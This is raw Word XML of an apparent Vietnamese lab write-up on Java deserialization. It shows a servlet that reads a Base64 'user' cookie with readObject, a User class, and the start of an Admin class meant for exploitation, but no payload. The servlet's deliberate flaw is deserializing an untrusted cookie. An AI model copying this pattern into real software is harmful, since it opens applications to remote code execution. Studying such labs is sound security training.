          <w:p w14:paraId="3F3FE796" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            response.setContentType("text/html");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11A44999" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            PrintWriter out = response.getWriter();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A83FD5" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            out.println("Something went wrong");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA5B2A2" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">            return;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C2CC09" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="361A77A5" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E18742C" w14:textId="77777777" w:rsidR="00BC22C6" w:rsidRDefault="005A6FB7" w:rsidP="008A5B4A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đoạn code này là </w:t>
      </w:r>
      <w:r w:rsidR="00AC7313">
        <w:t xml:space="preserve">phần chính của bài lab đầu tiên trong chủ đề java deserlization </w:t>
      </w:r>
      <w:r w:rsidR="00435A38">
        <w:t>bằng cách sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00BC22C6">
        <w:t xml:space="preserve"> các</w:t>
      </w:r>
      <w:r w:rsidR="00435A38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC22C6">
        <w:t>hàm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38145F0B" w14:textId="2C72ECDA" w:rsidR="00BC22C6" w:rsidRDefault="0095577B" w:rsidP="008A5B4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>seriali</w:t>
      </w:r>
      <w:r w:rsidR="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>zeToBase64: G</w:t>
      </w:r>
      <w:r w:rsidR="00DE3793" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ọi writeObject ghi vào ObjectOutputStream, rồi trả về chuỗi Base64</w:t>
      </w:r>
      <w:r w:rsidR="00DE3793" w:rsidRPr="00DE3793">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE3793" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">của mảng byte serialized </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418F7A67" w14:textId="5A1BD945" w:rsidR="002B505C" w:rsidRDefault="0095577B" w:rsidP="008A5B4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>deserialize</w:t>
      </w:r>
      <w:r w:rsidR="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">FromBase64: Giải nã Base64, tạo </w:t>
      </w:r>
      <w:r w:rsidR="00BC22C6" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ObjectOutputStream</w:t>
      </w:r>
      <w:r w:rsidR="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> từ byte array</w:t>
      </w:r>
      <w:r w:rsidR="00DE3793" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:r w:rsidR="00DE3793" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> gọi </w:t>
      </w:r>
      <w:r w:rsidR="00723784" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>readObject() nhằm unserialize thành object Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E381421" w14:textId="7CDD0A25" w:rsidR="00BC22C6" w:rsidRPr="00AE0A75" w:rsidRDefault="00BC22C6" w:rsidP="008A5B4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>doGet(): Lấy tất cả cookie từ request chuyển thành Map&lt;name,value&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00FC0161">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nếu cookie user chưa tồn tại, tạo </w:t>
      </w:r>
      <w:r w:rsidR="008A5B4A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">một user mới từ object User rồi </w:t>
      </w:r>
      <w:r w:rsidR="008A5B4A" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>seriali</w:t>
      </w:r>
      <w:r w:rsidR="008A5B4A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>zeToBase64(user) và gán giá trị này vào cookie user. Còn nếu đã tồn tại cookie user thì sẽ</w:t>
      </w:r>
      <w:r w:rsidR="006D1300">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> lấy cookie user rồi </w:t>
      </w:r>
      <w:r w:rsidR="008A5B4A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> dùng </w:t>
      </w:r>
      <w:r w:rsidR="008A5B4A" w:rsidRPr="00BC22C6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>deserialize</w:t>
      </w:r>
      <w:r w:rsidR="008A5B4A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">FromBase64 </w:t>
      </w:r>
      <w:r w:rsidR="006D1300">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">cad ép kiểu User rồi in ra </w:t>
      </w:r>
      <w:r w:rsidR="00B018DE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>giá trị user trong thẻ h1 trên giao diện web, nếu lỗi thì in Please don’t hack me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0D9F0" w14:textId="6CC21E9B" w:rsidR="00723784" w:rsidRPr="00AE0A75" w:rsidRDefault="00A666BE" w:rsidP="002B505C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Có thể thấy Object User được sử dụng chính trong đoạn code trên, vì vậy chuyển qua </w:t>
      </w:r>
      <w:r w:rsidR="0044348A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">xem </w:t>
      </w:r>
      <w:r w:rsidR="000806C7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidR="0044348A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> User: </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487173" w:rsidRPr="00487173" w14:paraId="1F9231BC" w14:textId="77777777" w:rsidTr="00487173">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7000539F" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5794E289" w14:textId="61B7CEB0" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C391A4" w14:textId="638117DE" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB6FB53" w14:textId="6A7D88FF" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D46237" w14:textId="6CFD874F" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C8A143" w14:textId="553CD862" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79DF538A" w14:textId="1A461D04" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0794CAED" w14:textId="0ED3EE22" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723987E3" w14:textId="7363535C" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56330A3E" w14:textId="6CB9DED8" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="006346DD">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1CE35B" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="124B1D69" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202DA951" w14:textId="1E5FCD68" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12C55A1A" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:lastRenderedPageBreak/>
              <w:t>public class User implements Serializable {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="381E4A79" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">    private String name;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D1BD22E" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    public User() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F5B20D4" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">        this.name = "Guest";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF24106" w14:textId="31A6F324" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B579F1" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">    @Override</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6113E8A4" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">    public String toString() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53D0D077" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">        return this.name;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC34F6B" w14:textId="31D00CC5" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38CA77E4" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">    public String getName() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A662C43" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">        return this.name;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0375A775" w14:textId="4EC32E8F" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A5ED6C" w14:textId="77777777" w:rsidR="00487173" w:rsidRPr="00487173" w:rsidRDefault="00487173" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00487173">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C6C3E87" w14:textId="5106FFFA" w:rsidR="0002152D" w:rsidRDefault="003F365E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidR="0044348A">
        <w:t xml:space="preserve"> User đơn giản chỉ có </w:t>
      </w:r>
      <w:r w:rsidR="00026CEE">
        <w:t xml:space="preserve">thuộc tính name và các hàm như hàm khởi tạo </w:t>
      </w:r>
      <w:r w:rsidR="00147DEA">
        <w:t>User()</w:t>
      </w:r>
      <w:r w:rsidR="00026CEE">
        <w:t xml:space="preserve"> để gán biến name bằng Guest, </w:t>
      </w:r>
      <w:r w:rsidR="00147DEA">
        <w:t>toString()</w:t>
      </w:r>
      <w:r w:rsidR="00026CEE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C34353">
        <w:t xml:space="preserve">là 1 magic method </w:t>
      </w:r>
      <w:r w:rsidR="00026CEE">
        <w:t xml:space="preserve">để dùng in giá trị name khi thực hiện đưa giá trị user vào trong thẻ h1 trong code </w:t>
      </w:r>
      <w:r w:rsidR="00923822">
        <w:t xml:space="preserve">chính.Cuối cùng là hàm getName() cũng trả về giá trị </w:t>
      </w:r>
      <w:r w:rsidR="00147DEA">
        <w:t>name như toString().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0E31FA" w14:textId="184EAA3D" w:rsidR="00147DEA" w:rsidRDefault="00147DEA">
      <w:r>
        <w:t xml:space="preserve">Ngoài ra có một class phục vụ cho việc khai thác của mục tiêu bài lab này là class </w:t>
      </w:r>
      <w:r w:rsidR="000806C7">
        <w:t>Admin:</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AC5D23" w:rsidRPr="00AC5D23" w14:paraId="7AF43FCF" w14:textId="77777777" w:rsidTr="00AC5D23">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F436D9" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE8F2A1" w14:textId="2E200FFE" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB0F57C" w14:textId="1F125B0E" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BC67E92" w14:textId="1E3BE6C4" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68F28FDD" w14:textId="7B10B1A6" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C85EF8C" w14:textId="4A7C1797" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794394AA" w14:textId="15A1DBD7" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30AB308D" w14:textId="7D7B94BA" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32724F31" w14:textId="0905AAAB" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6654C697" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D538D1C" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF4FCC5" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6959477B" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2118317F" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="382F999F" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
